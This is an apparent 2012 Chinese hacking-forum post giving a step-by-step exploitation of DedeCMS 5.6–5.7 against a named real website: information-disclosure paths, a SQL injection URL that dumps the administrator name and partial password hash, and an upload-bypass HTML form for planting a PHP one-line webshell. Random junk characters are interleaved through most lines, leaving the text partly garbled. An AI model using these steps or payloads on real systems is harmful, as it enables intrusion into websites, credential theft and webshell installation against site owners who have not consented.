中国网络渗透测试联盟

标题: dedecms5.6-5.7注入与上传漏洞利用 [打印本页]
作者: admin    时间: 2012-9-13 10:56
标题: dedecms5.6-5.7注入与上传漏洞利用
①注入漏洞。  P/ z  I( o7 ?# {& v  j2 e
这站 http://www.political-security.com/
7 A+ Z9 R* ~6 {5 _: @+ i首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
9 U& y$ d; n, s7 {www.political-security.com/data/mysql_error_trace.inc 爆后台9 w9 j4 u+ g7 C( V1 G5 d" f
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
* m6 J% V& H4 I然后写上语句 . B2 U  `8 Z4 [. G8 @6 A
查看管理员帐号5 [( E* J& `5 Z! M5 e  N& G
http://www.political-security.co ... &membergroup=@`
2 t5 Y, P. S% m' X
; G8 V, S$ w1 `$ m: o- Jadmin & B* C& O5 F+ Q/ ^

5 E& p! \* O  I1 n查看管理员密码1 W- t. t" w: C0 D! H) r! ], L
 http://www.political-security.co ... &membergroup=@`
! F$ h$ o* y, k2 M4 |7 ?; S( b& X
+ A" C6 f" }$ y% D8d29b1ef9f8c5a5af429
- c6 B: B' m& {' S; L2 w0 e' `
$ G7 z, Z# Z  }  ]5 D- ?& E& `5 _查看管理员密码" V% Q, T; s4 P" [* V) }

' l- F" _5 e* C得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5/ a- H# y$ k- V. Z4 i# b$ h$ C2 M
8 w" r" I% V. q5 @
8d2$ o  ^, j" d6 M% c
9b1ef9f8c5a5af42; z4 Y8 t1 }' k3 V, f
9
( b! U6 C3 V4 [1 c' _- l; }/ [& T9 G; O; P" q
cmd5没解出来 只好测试第二个方法% D; {  @; V: p- O+ a" F1 r
' f2 ~3 X& Y7 M8 e+ W

1 s: @9 q9 e2 a8 R# W$ \/ g0 ~②上传漏洞:
1 y+ ?5 H% b% L3 }0 K8 V$ l
8 X1 V, h/ k6 P7 ?只要登陆会员中心,然后访问页面链接3 ~1 W/ B) ]' T' \6 p; i
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”9 M8 S- J0 A% U8 M0 W

% u! W0 x8 o6 n" V* Z" L5 z如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
+ g6 V: \7 R7 {) [( n" a4 O: d/ @, B9 i* h8 A8 |
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm( i1 B; m. D) F
0 a) h  N; o/ Y5 `
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>/ F1 h% h4 y( F) _6 C! A, x
或者
, U. d6 g; b: f& \4 s  M* ^" q即可上传成功



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2